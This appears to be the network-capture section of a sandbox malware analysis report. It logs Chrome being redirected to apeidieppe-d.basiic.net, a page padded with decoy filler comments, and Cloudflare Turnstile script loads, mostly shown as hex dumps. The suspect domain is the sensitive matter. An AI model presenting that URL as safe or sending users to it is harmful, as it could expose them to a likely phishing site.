                                                                                                                  2024-10-22 14:08:16 UTC252INData Raw: 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 65 69 64 69 65 70 70 65 2d 64 2e 62 61 73 69 69 63 2e 6e 65 74 2f 79 4b 4b 57 64 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                  Data Ascii: f6<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://apeidieppe-d.basiic.net/yKKWd/">here</a>.</p></body></html>
                                                                                                                  2024-10-22 14:08:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  1192.168.2.1649712184.28.90.27443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:16 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  Accept-Encoding: identity
                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                  Host: fs.microsoft.com
                                                                                                                  2024-10-22 14:08:16 UTC467INHTTP/1.1 200 OK
                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                  Server: ECAcc (lpl/EF06)
                                                                                                                  X-CID: 11
                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                  X-Ms-Region: prod-neu-z1
                                                                                                                  Cache-Control: public, max-age=182276
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:16 GMT
                                                                                                                  Connection: close
                                                                                                                  X-CID: 2


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.1649714188.114.97.34432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:16 UTC672OUTGET /yKKWd/ HTTP/1.1
                                                                                                                  Host: apeidieppe-d.basiic.net
                                                                                                                  Connection: keep-alive
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:16 UTC969INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:16 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  X-Powered-By: PHP/8.0.30
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  Set-Cookie: PHPSESSID=4ghhpb396a5ubs4qoebu2iv728; path=/
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OOwZsfcJOBvyD1QspfGJ6vsonrwXERqfbSF0neIBb9cFFu2EgRE3ngiqbhl0aLKX9HLDuVCg%2F2CXmw0OVyiSIV%2B0JDAEZKTqP4gy4ERZ7Ac65iGcRQTcqvFr5x9mcN3Z99D7evEmgtLcew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0ef7ff56e776-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1250&delivery_rate=2429530&cwnd=249&unsent_bytes=0&cid=6b99565f79717f24&ts=797&x=0"
                                                                                                                  2024-10-22 14:08:16 UTC1369INData Raw: 61 65 33 0d 0a 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 69 6e 65 53 70 72 6f 75 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 3c 73 70 61 6e 3e 54 68 65 20 6a 6f 75 72 6e 61 6c 69 73 74 20 77 72 6f 74 65 20 61 6e 20 61 72 74 69 63 6c 65 20 61 62 6f 75 74 20 74 68 65 20 63 6f 6d 6d 75 6e 69 74 79 e2 80 99 73 20 6c 61 74 65 73 74 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 61 6c 20 65 66 66 6f 72 74 73 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d
                                                                                                                  Data Ascii: ae3 <html lang="en"> <head> <meta charset="UTF-8"> <title>PineSprout</title> ... <span>The journalist wrote an article about the communitys latest environmental efforts.</span> --> <meta name="robots" content=
                                                                                                                  2024-10-22 14:08:16 UTC1369INData Raw: 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 54 68 65 20 65 6e 67 69 6e 65 65 72 20 74 65 73 74 65 64 20 6e 65 77 20 6d 61 74 65 72 69 61 6c 73 20 66 6f 72 20 62 75 69 6c 64 69 6e 67 20 73 74 72 6f 6e 67 65 72 20 73 74 72 75 63 74 75 72 65 73 2e 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 54 68 65 20 62 61 6b 65 72 20 64 65 63 6f 72 61 74 65 64 20 61 20 63 61 6b 65 20 77 69 74 68 20 69 6e 74 72 69 63 61 74 65 20 64 65 73 69 67 6e 73 2c 20 70 65 72 66 65 63 74 69 6e 67 20 65 76 65 72 79 20 64 65 74 61 69 6c 2e 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 74 2d 32 22 3e 3c 21 2d 2d 20 3c 70 3e 54 68 65 20
                                                                                                                  Data Ascii: "> ... The engineer tested new materials for building stronger structures. --> ... The baker decorated a cake with intricate designs, perfecting every detail. --> <div class="mt-2">... <p>The
                                                                                                                  2024-10-22 14:08:16 UTC56INData Raw: 20 6c 61 6e 64 69 6e 67 20 61 74 20 74 68 65 20 61 69 72 70 6f 72 74 2e 20 2d 2d 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                  Data Ascii: landing at the airport. --> </body> </html>
                                                                                                                  2024-10-22 14:08:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  3192.168.2.1649716184.28.90.27443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:17 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  Accept-Encoding: identity
                                                                                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                  Range: bytes=0-2147483646
                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                  Host: fs.microsoft.com
                                                                                                                  2024-10-22 14:08:17 UTC515INHTTP/1.1 200 OK
                                                                                                                  ApiVersion: Distribute 1.1
                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                  Server: ECAcc (lpl/EF06)
                                                                                                                  X-CID: 11
                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                  X-Ms-Region: prod-weu-z1
                                                                                                                  Cache-Control: public, max-age=182244
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:17 GMT
                                                                                                                  Content-Length: 55
                                                                                                                  Connection: close
                                                                                                                  X-CID: 2
                                                                                                                  2024-10-22 14:08:17 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.1649717104.18.94.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:17 UTC551OUTGET /turnstile/v0/api.js HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:17 UTC386INHTTP/1.1 302 Found
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:17 GMT
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  access-control-allow-origin: *
                                                                                                                  cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  location: /turnstile/v0/g/f2bbd6738e15/api.js
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0efe7f32eabd-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.1649718104.18.94.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:18 UTC566OUTGET /turnstile/v0/g/f2bbd6738e15/api.js HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:18 UTC471INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:18 GMT
                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                  Content-Length: 47532
                                                                                                                  Connection: close
                                                                                                                  accept-ranges: bytes
                                                                                                                  last-modified: Fri, 18 Oct 2024 17:38:58 GMT
                                                                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                  access-control-allow-origin: *
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a0f034d96ddad-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:08:18 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 68 29 7b 74 72 79 7b 76 61 72 20 70 3d 65 5b 6c 5d 28 68 29 2c 66 3d 70 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 6e 28 73 29 3b 72 65 74 75 72 6e 7d 70 2e 64 6f 6e 65 3f 72 28 66 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 66 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                  Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var p=e[l](h),f=p.value}catch(s){n(s);return}p.done?r(f):Promise.resolve(f).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                  2024-10-22 14:08:18 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                  Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function rt(e,r){return r=r!=nu
                                                                                                                  2024-10-22 14:08:18 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 6e 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                  Data Ascii: ray$/.test(n))return nt(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function U(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var n={label:0,sent:function(){if(l[0
                                                                                                                  2024-10-22 14:08:18 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var Ue=300030;var Ve=300031;var q;(fu
                                                                                                                  2024-10-22 14:08:18 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                                                                  Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                                                                  2024-10-22 14:08:18 UTC1369INData Raw: 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 51 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72
                                                                                                                  Data Ascii: e","false"],e)}function gt(e){return L(["render","execute"],e)}var Qt=300,$t=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOver
                                                                                                                  2024-10-22 14:08:18 UTC1369INData Raw: 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 73 29 7d 76 61 72 20 54 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 68 3d 4c 28 4e 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 70 2c
                                                                                                                  Data Ascii: age,"/").concat(s)}var Tt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,h=L(Nr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),p,
                                                                                                                  2024-10-22 14:08:18 UTC1369INData Raw: 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 42 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 68 29 7b 76 61 72 20 70 3d 5b 6e 75 6c 6c 5d 3b 70 2e 70 75 73 68 2e 61 70 70 6c 79 28 70 2c 6c 29 3b 76 61 72 20 66 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 70 29 2c 73 3d 6e 65 77 20 66 3b 72 65 74 75 72 6e 20 68 26 26 4a 28 73 2c 68 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74
                                                                                                                  Data Ascii: ect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return Be()?Ie=Reflect.construct:Ie=function(c,l,h){var p=[null];p.push.apply(p,l);var f=Function.bind.apply(c,p),s=new f;return h&&J(s,h.prototype),s},Ie.apply(null,argument
                                                                                                                  2024-10-22 14:08:18 UTC1369INData Raw: 74 69 6f 6e 20 67 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63
                                                                                                                  Data Ascii: tion g(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}func
                                                                                                                  2024-10-22 14:08:18 UTC1369INData Raw: 6f 70 3d 22 30 22 2c 70 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 70 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 70 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 70 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 70 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 66 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 66 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 66 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 66 2e 73 74 79 6c
